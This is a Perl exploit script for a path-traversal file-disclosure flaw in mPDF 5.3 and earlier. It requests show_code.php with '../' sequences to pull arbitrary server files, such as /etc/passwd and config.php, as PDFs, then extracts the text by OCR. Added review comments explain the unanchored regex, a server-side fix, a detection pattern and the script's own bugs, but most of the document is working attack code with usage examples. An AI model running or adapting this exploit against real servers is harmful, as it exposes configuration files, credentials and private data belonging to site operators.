# Exploit Title: mPDF <= 5.3 File Disclosure
# Google Dork: Please no dork
# Date: 16th December 2011
# Author: ZadYree
# Software Link: http://www.mpdf1.com/mpdf/download
# Version: 5.3 and prior
# Tested on: Multiple
# CVE : N/A
#!/usr/bin/perl -U
=head1 TITLE
mPDF <= 5.3 File Disclosure Exploit (0day)
=head2 SYNOPSIS
-- examples/show_code.php --
preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/',$filename,$m); <--- URI improperly filtered (the pattern is not anchored).
$num = intval($m[1]);
$title = ucfirst(preg_replace('/_/',' ',$m[2]));
if (!$num || !$title) { die("Invalid file"); }
=head2 DESCRIPTION
This vulnerability, due to a weak filter, lets you download any unprotected remote
content, in PDF format.
The exploit may not work, depending on the .htaccess/chmod rules set up on the
remote server.
=head2 USAGE
perl exploit.pl -r http://p00niez.com/mpdf53/ ../config.php
perl exploit.pl -a http://p00niez.com/mpdf53/ /etc/passwd
Required modules:
PDF::OCR2
LWP::Simple
File::Type
Download a module:
sudo cpan -fi install Module::Name
=head3 Author
Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog
=head3 Thanks
PHDays CTF - Yes, CTFs sometimes do give you 0dayz
3LRVS Team - Support
=cut
#************* Configuration **************#
# Path of the downloaded PDF before OCR. NOTE(review): a fixed name inside a
# shared /tmp is predictable; a pre-existing file or symlink at this path is
# overwritten/followed by make_file() below.
my $pdf_file = '/tmp/b00m.pdf';
# Package variable read by PDF::OCR2; presumably 0 disables the module's own PDF
# validity check (this script validates with is_pdf() instead) -- confirm against
# the module's documentation.
$PDF::OCR2::CHECK_PDF = 0;
# When true, $pdf_file is removed after extraction (see the unlink at the end).
# Undeclared global: the script does not `use strict`.
$del_temp_file = 1;
#******************************************#
use 5.010;
use PDF::OCR2;
use Getopt::Std;
use LWP::Simple;
use File::Type;
use constant TRUE => 1;
use constant FALSE => 0;
# At least the mPDF base URL and a file path must be present after the switches.
help() unless (@ARGV >= 2);
my (%optz, $uri);
getopts('rah', \%optz);
my $relative = $optz{'r'};
my $absolute = $optz{'a'};
my $help = $optz{'h'};
# NOTE: `$relatife` is a misspelling of $relative and is never assigned (no
# `use strict` to catch it), so this guard only passes when -a was given.
help() unless ($absolute || $relatife);
my ($purl, $fpath) = @ARGV;
# Output file name: host part of the base URL plus a timestamp. localtime() in
# string context contains spaces and colons, so the name looks like
# "host_Fri Dec 16 12:00:00 2011.txt" (constructed example).
my $name = $purl;
$name =~ s{http://(.+?)/.*} {$1};
$name .= ("_" . localtime(time) . ".txt");
# The vulnerable endpoint (see SYNOPSIS): show_code.php's preg_match is not
# anchored, so a value that merely contains "exampleNN_name.php" is accepted and
# the "/../" segments that follow are passed through to the file read. Server-side
# fix: anchor the pattern (\A ... \z), resolve the final path and verify it stays
# inside the examples directory, and do not ship the examples directory on
# production installs. Detection: requests to show_code.php whose filename
# parameter contains "../".
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute);
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative);
help() unless ($uri);
my $furl = $purl . $uri . $fpath;
# Collapse every "//" except the first one (the one in "http://") to a single "/".
# $i is an undeclared global counter: false (0) on the first match only.
$furl =~ s#(//)#$i++?"/":$1#eg; # Yeah that's twisted.
say "[*]Retrieving content...";
# get() returns undef when the request fails; make_file() then writes an empty
# file, which is_pdf() rejects on the next line.
my $file = make_file(get($furl));
die "[-]The stream you requested is not well formatted (forbidden page, etc).\012" unless is_pdf($file);
say "[+]OK\012[*]Converting format...";
# Undeclared global (no `use strict`).
$pdf = PDF::OCR2->new($file);
my $text = $pdf->text;
# Strip every byte outside 0x0A-0x7F (non-ASCII and control characters below LF).
$text =~ s/[^\x0A-\x7F]+?//gm;
# Result goes to $name in the current directory; open/close results are not checked.
open(my $fh, '>', $name);
print $fh $text;
close($fh);
say "[+]OK\012[+]Content successfully extracted!\nFile: ", $name;
unlink($pdf_file) if ($del_temp_file == TRUE);
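# Write a response body to the configured temp path and return that path.
# Argument: the raw body returned by get(); may be undef when the request failed,
# in which case an empty file is written (is_pdf() rejects it afterwards).
# Returns: $pdf_file, the file-scoped path the rest of the script reads back.
# Dies if the temp file cannot be opened or flushed, rather than silently
# continuing with a missing or partial file.
# NOTE(review): $pdf_file is a fixed, predictable name in a shared /tmp; an
# existing file or symlink there is overwritten/followed.
sub make_file {
my $content = shift;
# Private handle: do not reuse the file-scoped $fh that the main script opens later.
open(my $out, '>', $pdf_file) or die "[-]Cannot write $pdf_file: $!\012";
# The body is a binary PDF stream; disable any newline translation.
binmode($out);
print {$out} (defined $content ? $content : '');
# Buffered write errors only surface at close.
close($out) or die "[-]Cannot close $pdf_file: $!\012";
return($pdf_file);
}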
# Return 1 when File::Type identifies the file at the given path as
# application/pdf, 0 for any other MIME type.
sub is_pdf {
my $checked_file = shift;
my $mime = File::Type->new()->mime_type($checked_file);
return($mime eq "application/pdf" ? 1 : 0);
}
# -h is only honoured here, after the download and conversion above have already
# run; the earlier guards exit via help() only for missing arguments.
help() if ($help);
# Print the usage text (with the script name interpolated) and exit with status 0.
sub help {
    my $usage = <<"EOF";
Usage: perl $0 [-r|-a] http://[mPDF URL] <file_to_read>
Details:
-r : Relative path (ex: ../file.php)
-a : Absolute path (ex: /etc/file.zd)
For any more information, feel free to contact ZadYree
Happy hacking!
EOF
    # The original used say(), which adds a newline after the heredoc's own.
    print $usage, "\n";
    exit(0);
}